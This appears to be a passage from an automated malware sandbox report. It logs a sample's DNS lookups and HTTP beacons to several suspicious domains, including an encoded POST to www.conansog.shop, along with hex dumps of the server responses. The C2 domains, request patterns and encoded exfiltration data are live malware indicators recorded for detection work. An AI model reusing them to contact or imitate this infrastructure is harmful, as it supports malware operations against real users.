  Host: www.conansog.shop
  Connection: close
  User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
Source: global traffic | HTTP traffic detected:
  GET /zr8v/?zfI=jXEDeV4Xp62&StWXF0Jx=Ml5gZJW5QcanJzzDoQq3UEdCVeZH9JbjcVoAzcC8IkgnBjkPfLtOabWm5tXm+g1ABEyKJ0nQQaWBnIlmZ5M263kDoloi41FTqGteT0eMG8ZHw0bPQeAXlqBGUQENUFkujA== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Host: www.rgenerousrs.store
  Connection: close
  User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
Source: global traffic | HTTP traffic detected:
  GET /ejy6/?StWXF0Jx=nKtLiO3xWkrMlPGEGL30zIXLkoLy8zu8J2L8rFbijJp7RB7dx3B4j1jKRr2O123OfZ5OtYyfrlQmcwQG+aranSp3PUfv2y2fa3KrcIq96NlU6xjN1E0Tt4TY0B9th5DEOw==&zfI=jXEDeV4Xp62 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Host: www.sipdontshoot.net
  Connection: close
  User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
Source: global traffic | HTTP traffic detected:
  GET /stx5/?zfI=jXEDeV4Xp62&StWXF0Jx=imPmf4gI1srj4STUrrMqNbgzS3ndO2Vfzd18ejlEFaVa4JSUkoHJ3l86KKOOva+7SWLQrsvslnf4fofCRXFAlseOCWBGmtkXklnnJa1INqnCq9NgN4lUNFEyHKg1xfk7mg== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Host: www.tals.xyz
  Connection: close
  User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
Source: global traffic | HTTP traffic detected:
  GET /i5gf/?StWXF0Jx=b5EB5wzy9Ffpgxi54+1Z/hpFI4wOrvBGEdwPVoWw9aB094XdY8Z4QvLyijfbNXTXb/o83TjYq8/0I5ZRzCl+Qa/gFZ4gxutURWfxeLyMh3oNbVjBJMQVGcVSIottQNNDqQ==&zfI=jXEDeV4Xp62 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Host: www.hobbihub.info
  Connection: close
  User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
Source: global traffic | HTTP traffic detected:
  GET /6rpr/?StWXF0Jx=U6INZSFl9w/0w7eUclNH1uQloYv6GNk9LcyHZGh1ex/X83RYU2QqyJ4e030xcVzYUaotyR6kZc9FdKJmpo1DO/tZ9h4UUwPPiw7Wz8cuuN6k65sGyuw58EydjYd8v6xFYg==&zfI=jXEDeV4Xp62 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Host: www.76kdd.top
  Connection: close
  User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
Source: global traffic | DNS traffic detected: DNS query: www.7261ltajbc.bond
Source: global traffic | DNS traffic detected: DNS query: www.conansog.shop
Source: global traffic | DNS traffic detected: DNS query: www.rgenerousrs.store
Source: global traffic | DNS traffic detected: DNS query: www.sipdontshoot.net
Source: global traffic | DNS traffic detected: DNS query: www.tals.xyz
Source: global traffic | DNS traffic detected: DNS query: www.hobbihub.info
Source: global traffic | DNS traffic detected: DNS query: www.76kdd.top
                Source: unknownHTTP traffic detected: POST /us5e/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.conansog.shopConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 209Origin: http://www.conansog.shopReferer: http://www.conansog.shop/us5e/User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1Data Raw: 53 74 57 58 46 30 4a 78 3d 7a 31 59 39 79 6b 64 41 66 58 6b 48 54 57 73 37 33 72 4e 43 53 5a 65 71 4a 6d 44 73 63 4e 65 31 31 38 45 71 73 47 59 44 61 39 64 62 39 49 6b 45 73 33 4d 61 76 63 63 44 65 65 4e 68 54 6b 6b 34 79 67 4e 39 4f 64 6d 58 37 76 2b 57 79 36 5a 41 5a 61 4a 31 49 61 6a 62 62 55 68 69 65 47 47 33 6c 30 4f 6f 53 63 34 62 42 55 4f 7a 70 56 56 72 6a 66 4d 57 34 35 38 4e 63 33 72 34 32 46 74 69 4e 5a 51 41 58 6f 5a 62 76 76 2b 53 58 6d 4b 53 68 57 76 6e 55 6f 4e 46 75 45 70 47 67 53 77 50 71 68 39 37 32 52 62 48 32 57 4d 4c 6d 77 51 5a 43 33 5a 49 74 75 73 58 6b 6a 46 38 31 53 32 52 64 4c 4d 72 2b 59 55 3d Data Ascii: StWXF0Jx=z1Y9ykdAfXkHTWs73rNCSZeqJmDscNe118EqsGYDa9db9IkEs3MavccDeeNhTkk4ygN9OdmX7v+Wy6ZAZaJ1IajbbUhieGG3l0OoSc4bBUOzpVVrjfMW458Nc3r42FtiNZQAXoZbvv+SXmKShWvnUoNFuEpGgSwPqh972RbH2WMLmwQZC3ZItusXkjF81S2RdLMr+YU=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:17:48 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UL%2BQQ4tCCc6AxpKhva%2BzfcEbRTuxvV5VfAOfeCcAzI8zySXbY24csgCfUcvhOnDFovHjhBw0rolMNv%2B3IRzyAch%2BdJg%2BbrGJCuXBmZbWoxIfTijoPgOSnWKIxEWr%2FPlFS01a%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a6125ab40f68-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:17:51 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WuhUt7DYBU0dRmqFdJA8ZFy%2F%2FaDOfBq4mEYLQIxZT87ZgH3liJzegK9uYdtu1tEJEaJLzzsDh178IoWzk9i5x8z92YyJIsOqFgCoigIh1sEW8WbdU30QVDponseqWNfgzaBhyg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a6238ad58cb3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2057&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=806&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:17:54 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BafI9j%2Bi%2Bvv10noNw6twKzYlabLpFLXV78H6cws9FqUCn%2BCbeURGInbCNCDNRmd7yE1zjuC9DZrfROQtwVzaqhW3mJ0zyPmFGn5yMk5MxZU50e0jtl5pkk4wA75aBNk53jqJEA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a6341e921899-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1660&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1823&delivery_rate=0&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:17:56 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LMkEzQI3WwZNrbhPOGAym1Zx0McZ610w0j8HbV%2BSmtvft%2B8adHQSVXd20DYSLi2%2Bza7abWPfvzoLcEwRKoXGx5%2Fb2NV80zjmGL3K6ogyPSqV5SoPQwfKO2NbtT74YMzwAxTe8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a6444f94c42c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1625&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=528&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jz0EPEM%2BKj9v9tGOK3%2FVVwcGi%2BJ8vi6PJxAk6rK2fmtcNrtXz1yNwq2gQ8QLllVHsM3yk8cVH5NNbdNSyNJjl3o20P8m531h%2FtfHM9Q9BeSRF8Mbd2bmCdi35tKDUZqGBe9unVZy95o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a66edd48726b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7SJR5PAu6Nvu2bnzCicAlwpGdhkyLevVIMEU5XJeExmwCLPFp1x0g%2B46%2BQQ1bw6Hh%2BMVbTqYUZAXKCbWSAind3tHQR9Gh3vVcR%2BmlZMGNx%2BfFg002IverXm51rusheP8qRBNebqohs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a67efcab0caa-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=818&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z218R7hiMB%2FYE5GRs6PzgTsug9LauZH6l7NfPiZmk1pwEO2zIcMHtaDTijsKGS57hvq6rfdpXZL2jz6LMNizXemOOukA4fV3aU1Y5ayEvimSSCBHYCG6ax6aYeBoDqNDgPFqvpCu9o0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a6901ae743a4-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2248&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1835&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S9smxA9CAoaDJkDaO48BC%2BUe5cRz1tAvAZqVhqHryPAkE47hpOwHBJpqZk51nyDpkWVNChxXgw2G%2FqTGHwiCQ4uL6mksdLI8406OwZflfmWwitfoH9naUDE25UZ9Eq4Eyg%2BwB5DYaoo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61a6a0dfcc41e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1761&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=532&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 10aad33d-bb1a-4529-b4ba-eb15a1f9f864x-runtime: 0.025302content-length: 17147connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 
6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 3fe04f35-cfa6-45d3-b1a0-28d151e173c8x-runtime: 0.036349content-length: 17167connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 